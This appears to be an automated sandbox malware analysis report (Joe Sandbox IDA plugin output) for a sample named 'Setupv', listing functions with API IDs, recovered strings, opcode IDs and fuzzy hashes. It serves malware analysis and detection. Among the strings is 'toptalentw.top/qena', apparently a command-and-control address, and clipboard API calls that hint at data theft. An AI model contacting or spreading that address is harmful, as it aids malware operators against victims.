                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeSecurity
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 640775948-0
                                                                                                                                                                                                                          • Opcode ID: 0d1f94dc5161434ea110c0f12c950368998807c6b24d44ab5b6a9b0928f4d5c1
                                                                                                                                                                                                                          • Instruction ID: b82a824dee8b1063c8e22ba2958957e214ecb925434dd0ebc17a407727d9b623
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0d1f94dc5161434ea110c0f12c950368998807c6b24d44ab5b6a9b0928f4d5c1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AED092307D8328B6F1B02A09AC0BF0832A46303F32FB00B01F328BC0C08AE071618A1D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 02E220DB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Initialize
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2538663250-0
                                                                                                                                                                                                                          • Opcode ID: c2434f00979c665c89a54391bbed84d7ce2f4675a98d61954539fda2d9c8a86a
                                                                                                                                                                                                                          • Instruction ID: a9e67e3a94c3b46f428f0e56dfb13ea88f97167b801e35f7414f40d384420aa2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c2434f00979c665c89a54391bbed84d7ce2f4675a98d61954539fda2d9c8a86a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F1A001309F8264CAE3592A5AA41970A3664BB53742F800959E24588481DA6150B1DB62

                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: E2G$ i"k$ i"k$#U?W$%eVg$%eVg$0P$4IK$5u8w$5u8w$6Y>[$:yH{$:yH{$<M:O$<M:O$>q=s$>q=s$@5A7$@5H7$AB$AB$C-H/$G1I3$G1I3$PaSc$PaSc$W@$X=i?$X=i?$]!Q#$]!Q#$]%R'$_)T+$_m,o$_m,o$aQ.S$aQ.S$eUgW$eUgW$ho!$ho!$iYi[$iYi[$|-\/$Y_
                                                                                                                                                                                                                          • API String ID: 0-2628018768
                                                                                                                                                                                                                          • Opcode ID: dedd91872e8c970cea4ec13bea0bb14fb09e4a252054f7e25504129936c2bc0e
                                                                                                                                                                                                                          • Instruction ID: 05940069cbbec92d37fe4d7135187c2e2acbdb7ddc5613da623c471ed60eb823
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dedd91872e8c970cea4ec13bea0bb14fb09e4a252054f7e25504129936c2bc0e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90B273B4A107568FD708CF16D884699BBB1FF45348F298AACC4995F756CB719882CF80
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                                                                                                                                          • String ID: ($.$/$3$4$6$9$:$;$K
                                                                                                                                                                                                                          • API String ID: 1006321803-92690712
                                                                                                                                                                                                                          • Opcode ID: 32678ae02ba6db916ad4ab09d216c0db73b9bddd0e8b9a2681d06b921df1debc
                                                                                                                                                                                                                          • Instruction ID: 4bdd6d1ebf8db6104e337549bcc706c1ca0dc7994c384ea3e83aad3eb8207dd0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 32678ae02ba6db916ad4ab09d216c0db73b9bddd0e8b9a2681d06b921df1debc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2751AD7164D3508FD301EF79948835FBFE1AB85358F08A92EE5C587381DA748649CB93
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: "$+$+r3G$0$=$D$E$F$F$G$G$H$H$I$I
                                                                                                                                                                                                                          • API String ID: 0-2892116429
                                                                                                                                                                                                                          • Opcode ID: 66d38afb40e206f17c523159bcde443870cfcd1f9ab590f69f6d5b355269dd98
                                                                                                                                                                                                                          • Instruction ID: a5cb1c1e121f087c7af1cb50f9f7884ce8d3fd06a465ee349c54bc31354e1e43
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 66d38afb40e206f17c523159bcde443870cfcd1f9ab590f69f6d5b355269dd98
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C582B4766487908BD338DF39C49539FBBE2AFC4314F09992DD8DA87391DA748845CB42
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: -(:*$4567$@$GFIH$GFIH$J$L$P$X54&
                                                                                                                                                                                                                          • API String ID: 0-4168977390
                                                                                                                                                                                                                          • Opcode ID: 15659f6195f1a1d0fb462983aa3c435ac871d4adc3077a641b85451f82346a24
                                                                                                                                                                                                                          • Instruction ID: 9f7d1ca202485449d4c32dd3badfb742a005c9c5b9a245eea4b74b20cc5cc4c7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 15659f6195f1a1d0fb462983aa3c435ac871d4adc3077a641b85451f82346a24
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37C20572A483508BD724CF29C8557ABB7E2FFC4318F15D92DE9D99B280DB749805CB82
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: $3$S$S$U$V$\$c$y
                                                                                                                                                                                                                          • API String ID: 0-4229947325
                                                                                                                                                                                                                          • Opcode ID: 7a5423f90ef40171aefc5af30662778270309252dca8d8c36a059816dcc4a809
                                                                                                                                                                                                                          • Instruction ID: 9b4ff151472d368c84df60064c2a203bd69dd8952f13d8967bfeb4b4f56308c3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a5423f90ef40171aefc5af30662778270309252dca8d8c36a059816dcc4a809
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26D1663365C7A04BD318C97D884129FBFC25BC5224F0DCA3DE8EAD7382D9A8C9058792
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: !5#,$'#'$/-),$5$>86>$J$T$ih
                                                                                                                                                                                                                          • API String ID: 0-2766606888
                                                                                                                                                                                                                          • Opcode ID: 1fe626059962fd580f825aa7d30306c2aa2ec4c590acafad5bca28e750327c78
                                                                                                                                                                                                                          • Instruction ID: 2c6b5bc6686218dfa3b91239e841d88c26f2b77b6ed3cc55deb419255e7d2f59
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1fe626059962fd580f825aa7d30306c2aa2ec4c590acafad5bca28e750327c78
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F1205725583918BD325CF29C49076BBBE2BFC6308F189A6DE4D5DB381D7788509CB82
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: )Ms$,h+J$,h+J$SWH`$WWH`$|}$u{
                                                                                                                                                                                                                          • API String ID: 0-1644346604
                                                                                                                                                                                                                          • Opcode ID: 435b0826bcaab2877061842dbf832956c1d3f76bb60962782365d402b85a8c60
                                                                                                                                                                                                                          • Instruction ID: a380b6f83b00002c4b8a2c3991d59d75ec3b2d2310c90a95bdaac3f8a9d6a617
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 435b0826bcaab2877061842dbf832956c1d3f76bb60962782365d402b85a8c60
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9F110715483418BC720CF28D86122BB7E2FFC6318F189A2DE9D58B391E735D905CB96
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: 2$5$A$J$q$s$u
                                                                                                                                                                                                                          • API String ID: 0-3366776672
                                                                                                                                                                                                                          • Opcode ID: cdb3fd810debcd08b2c6777ea5a5ba68934d62df4cd0dc600510c5ef91f29b55
                                                                                                                                                                                                                          • Instruction ID: 74a65744eeb44ca7ddfd306bc7a39e79263ba5a29f54e3fc12e718bd84656529
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cdb3fd810debcd08b2c6777ea5a5ba68934d62df4cd0dc600510c5ef91f29b55
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F226C75A4C7908BC334DF38C4943AEBBE2AFC9310F059A2DE9DA87391DA748545CB42
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: "0+2$(<(($//30$1$&8$:)3$toptalentw.top/qena$ !3
                                                                                                                                                                                                                          • API String ID: 0-1144212160
                                                                                                                                                                                                                          • Opcode ID: e175cee0d710ad9fe885e6b428efed09499abc2578e7bc1cabdb524406c68dca
                                                                                                                                                                                                                          • Instruction ID: 4941d90208ce599786c48b94ccfaad79c995e8bbce3225e81e5fcd8820967c3a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e175cee0d710ad9fe885e6b428efed09499abc2578e7bc1cabdb524406c68dca
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6ED19E766883504FD310CF6598913EBBBD2EBC1328F189E2CE5E58B392D77585098BC2
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: GFIH$a+<Z$a+<Z$a+<Z$a+<Z$0?~
                                                                                                                                                                                                                          • API String ID: 0-691672923
                                                                                                                                                                                                                          • Opcode ID: 554e3d2dd7d3834a601f5674abd95b7773e98a2e9c175ea10ceec1dca931afc7
                                                                                                                                                                                                                          • Instruction ID: 59d50b15eb0a72f647c727fb2781b3e13914ab836d10e18cf07377cb958c9c16
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 554e3d2dd7d3834a601f5674abd95b7773e98a2e9c175ea10ceec1dca931afc7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7625BB1A983208FD314DF28C881767B7E1EF85318F19E92CE98697391E775D908C792
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: -$9$B$h$j$j
                                                                                                                                                                                                                          • API String ID: 0-1340328496
                                                                                                                                                                                                                          • Opcode ID: 2d0b6e0954a410c12349e36e1b9f2970f50a8884589ab6992b9620bde379b04f
                                                                                                                                                                                                                          • Instruction ID: cc92bba90d5fc02bd1492abc5bed118655d07300ee11d54cf9bc505e62828026
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d0b6e0954a410c12349e36e1b9f2970f50a8884589ab6992b9620bde379b04f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F142D776A4C7908BC324DF39884039EFBD6ABC5324F199A6DD4DAC7391DA788805CB42
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: GFIH$GFIH$GFIH$f$?`m$?`m
                                                                                                                                                                                                                          • API String ID: 0-2726261967
                                                                                                                                                                                                                          • Opcode ID: df8bb9d78604c9c71988def96082f2a37a9fce914202a029dba6b25e83fcdc16
                                                                                                                                                                                                                          • Instruction ID: ea92bafc23bd84214909239f3935e5a62e4df86d65c753a2eeea9e1f2a59a484
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: df8bb9d78604c9c71988def96082f2a37a9fce914202a029dba6b25e83fcdc16
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FF021572AA83608BD314CF18C980B6BF7E6BFC4318F58DA1DEC9497291D775D8418B92
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: $E20D74B03AC0FC2B090A0D98DD00725C$j-J+$lm$}{
                                                                                                                                                                                                                          • API String ID: 0-1693390246
                                                                                                                                                                                                                          • Opcode ID: dfb5e287c56179632fe9dd1e56654783f5099ff31c9c285fd46d37b3eae5d6c4
                                                                                                                                                                                                                          • Instruction ID: 51120f334acb0ad3ef08faf53d08a9eeb38e000a54831dca9c226ed880f3476a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dfb5e287c56179632fe9dd1e56654783f5099ff31c9c285fd46d37b3eae5d6c4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44B1F1B56487408BC718CF25C8906ABBBE2FFC5308F18996DE4D68B255DB34D50ACB52
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: ><X$\$0?~$?`m
                                                                                                                                                                                                                          • API String ID: 0-3592648234
                                                                                                                                                                                                                          • Opcode ID: 23fdb0df4a590bc3224316aeecc9cd732b1c0ea93adf275b980924623c89960f
                                                                                                                                                                                                                          • Instruction ID: c8f51bd7d7b58f614733bd1798b13fc95f49b6aa7ee0e3472e1af29d46a7a174
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 23fdb0df4a590bc3224316aeecc9cd732b1c0ea93adf275b980924623c89960f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B324A726583618FC318CF18D8902AFF7E1EBC5314F159A2DE8E69B391C7749906CB92
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: GFIH$GFIH$GFIHGFIH$a+<Z
                                                                                                                                                                                                                          • API String ID: 0-819695447
                                                                                                                                                                                                                          • Opcode ID: fdffb7df5b7bf826fd88c8c2c2edc2de8cc59e0c3946e92aa9ced476ed72263b
                                                                                                                                                                                                                          • Instruction ID: a714c977dc5252951f807e90c0440f08adfac49ffb71c33454655324d02b6bea
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fdffb7df5b7bf826fd88c8c2c2edc2de8cc59e0c3946e92aa9ced476ed72263b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BCD12671A983208BD324CF29C89072BF7E2AFC9718F15DA2CEE9997295D735D801C791
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: )$IDAT$IEND$IHDR
                                                                                                                                                                                                                          • API String ID: 0-3181356877
                                                                                                                                                                                                                          • Opcode ID: 72edd46e0a4861403ea364714185f85c9edb9990f9f151956dd44f70992dc03e
                                                                                                                                                                                                                          • Instruction ID: 339c7f573666faab6e2e1cd4867269c9fb77863d084439035cb2326764ae7c12
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 72edd46e0a4861403ea364714185f85c9edb9990f9f151956dd44f70992dc03e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44D1ADB1A483449FD720CF24C845B9BBBE1AF94308F14996DF9999B381D375D908CF92
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: hl7$ll7$ac
                                                                                                                                                                                                                          • API String ID: 0-258634020
                                                                                                                                                                                                                          • Opcode ID: 8b7d1cec3482e14e65a26d11869eaa22ace84f657b394b35f119ce8d26c4b539
                                                                                                                                                                                                                          • Instruction ID: 7b198c4b4874e2b983a2944eac9af5b3c792d863bfc30696b8b326c4105764e3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b7d1cec3482e14e65a26d11869eaa22ace84f657b394b35f119ce8d26c4b539
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18723B72A487508FC318CF29C89065BFBE2BFC8314F19892EE999D7355DB749805CB86
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: !$s$z
                                                                                                                                                                                                                          • API String ID: 0-39609933
                                                                                                                                                                                                                          • Opcode ID: 7a5897ae5446c69e75d4dc6b6f1f1a393073668a3e24e1d86889d8cdee39d11c
                                                                                                                                                                                                                          • Instruction ID: 1dfdacfd3b1b77565b8a8f9a9e74792c0766408aef09d4fc14115a4d0f4883b4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a5897ae5446c69e75d4dc6b6f1f1a393073668a3e24e1d86889d8cdee39d11c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 49E171B554C7508BD324DF38C5903AEBBE2AFD8314F199A2EE8DAC7381DA748445CB42
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: GFIH$a+<Z$a+<Z
                                                                                                                                                                                                                          • API String ID: 0-957137415
                                                                                                                                                                                                                          • Opcode ID: 4f31859daed8f08bcb284263426ad925742d4043975dc3584a41d1e727b64c3b
                                                                                                                                                                                                                          • Instruction ID: 7ce56ed34f676ae323545e02fe7bfbf38bc5325591e4c98a2d206b9f72cfc70d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4f31859daed8f08bcb284263426ad925742d4043975dc3584a41d1e727b64c3b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B61ED34681A518FD3288F28C45573AB3E2FF81319F66EA6AD4D797290DB34B895CB40
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: <=$O-_+$P!{?
                                                                                                                                                                                                                          • API String ID: 0-2826889232
                                                                                                                                                                                                                          • Opcode ID: 442b49ac8609b7eaec9aa8aff133b52df6395876d10d0d039bc9c8602de1e698
                                                                                                                                                                                                                          • Instruction ID: af1b1a84d12acdf0476d087b33d553d334dadd1ae602f23c9712873c2b009462
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 442b49ac8609b7eaec9aa8aff133b52df6395876d10d0d039bc9c8602de1e698
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE31227299C3208AC714CF15C890227B7F2EFC6694F099A5DE8D59B660E7398905CBE2
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: 0$8
                                                                                                                                                                                                                          • API String ID: 0-46163386
                                                                                                                                                                                                                          • Opcode ID: 4bd60bf1f8aa0f2d4f7edf573e90e7d2180740a8a1e3c216ea3987c033414842
                                                                                                                                                                                                                          • Instruction ID: 6cb4dd3cc7e36335422f29553432d9c1c14e56309818ea3d3de257dad0b11415
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4bd60bf1f8aa0f2d4f7edf573e90e7d2180740a8a1e3c216ea3987c033414842
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A17258716083419FE714CF28C880BABBBE1BF88718F04992DF99987391D775D958CB92
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: ~${
                                                                                                                                                                                                                          • API String ID: 0-1705458366
                                                                                                                                                                                                                          • Opcode ID: e2d801d7c768d4b9ea54a23e332fff6aed507f01760128183fdb32230e33d30f
                                                                                                                                                                                                                          • Instruction ID: 43e36c49928f2010acab32f35ac1660722637d811330eb3258f851c3dca65b72
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e2d801d7c768d4b9ea54a23e332fff6aed507f01760128183fdb32230e33d30f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2025EB4900B009FC364DF39C946BA3BBF5FB45310F049A6DE4AACB795E735A4058B92
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: 1UHK$TUVW1UHK
                                                                                                                                                                                                                          • API String ID: 0-2946786801
                                                                                                                                                                                                                          • Opcode ID: 25e6fea26df132599c925c4e171fa37cb07f5b7672f8d82f6b74a4d921257ad6
                                                                                                                                                                                                                          • Instruction ID: aea519bf8c0bd2ebaa6d5d28fc879c13cd6e5c6a652c83dd949cb25ed250595d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 25e6fea26df132599c925c4e171fa37cb07f5b7672f8d82f6b74a4d921257ad6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 52F1DC71A093419BD724DF28C885A6BFBE5EFC5318F04992CE9D98B380E7B4D805CB46
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: URS$YW
                                                                                                                                                                                                                          • API String ID: 0-3812113581
